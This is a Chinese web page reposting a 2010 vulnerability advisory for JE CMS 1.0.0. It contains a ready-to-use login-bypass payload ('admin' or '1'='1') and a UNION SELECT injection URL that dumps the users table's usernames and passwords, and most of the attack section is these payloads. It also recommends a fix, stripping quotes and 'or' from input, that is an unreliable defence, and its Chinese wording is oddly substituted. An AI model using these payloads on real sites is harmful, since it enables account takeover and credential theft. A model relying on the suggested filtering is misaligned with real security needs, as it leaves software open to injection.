当前位置:七道奇文章资讯安全技术网络技术
日期:2010-10-01 01:12:00  来源:本站整理

JE CMS 1.0.0 万能密码登录与注入漏洞与修复[网络技术]

赞助商链接



  本文“JE CMS 1.0.0 万能密码登录与注入漏洞与修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

JE CMS <= 1.0.0程序呈现两处漏洞,一处在登录考证可以利用万能密码绕过.另一处是SQL注入漏洞.

1. Bypass Authentication by SQL Injection Vulnerability //登录考证漏洞

in administrator\login.php page, lines 16-20: //login.php页16-20行(代码省略)

POC:

in administrator/login.php


username: admin' or '1'='1

password: admin' or '1'='1

2. SQL injection in administrator\index.php on "userid" parameter: //SQL注入漏洞


in administrator\index.php file line 12:(代码省略)

POC:


http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--

安全防备:

严峻过滤

 过滤变量    '   '     or   替换位空


  以上是“JE CMS 1.0.0 万能密码登录与注入漏洞与修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 有孔就入 SQL Injection的深化探究
  • 针对SQL INJECTION的SQL SERVER安全设置初级篇
  • PHP Data Object 新的数据库衔接方法
  • java Object.clone()的效果
  • equals(Object) 与 == 的辨别
  • Java中Object类的equals()和hashCode()办法深化解析
  • 体验Spring的Object/XML映射支持
  • Eclipse Voice Tools Project :关于得到和扩大语音开辟工具的一
  • 在C++中实现同步锁,近似Synchronize(object){....}
  • Qt学习之路(10):Meta-Object系统
  • <b>C++内存管理改革(4): boost::object_pool</b>
  • <b>察看者情势(Subject/Observer)</b>
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .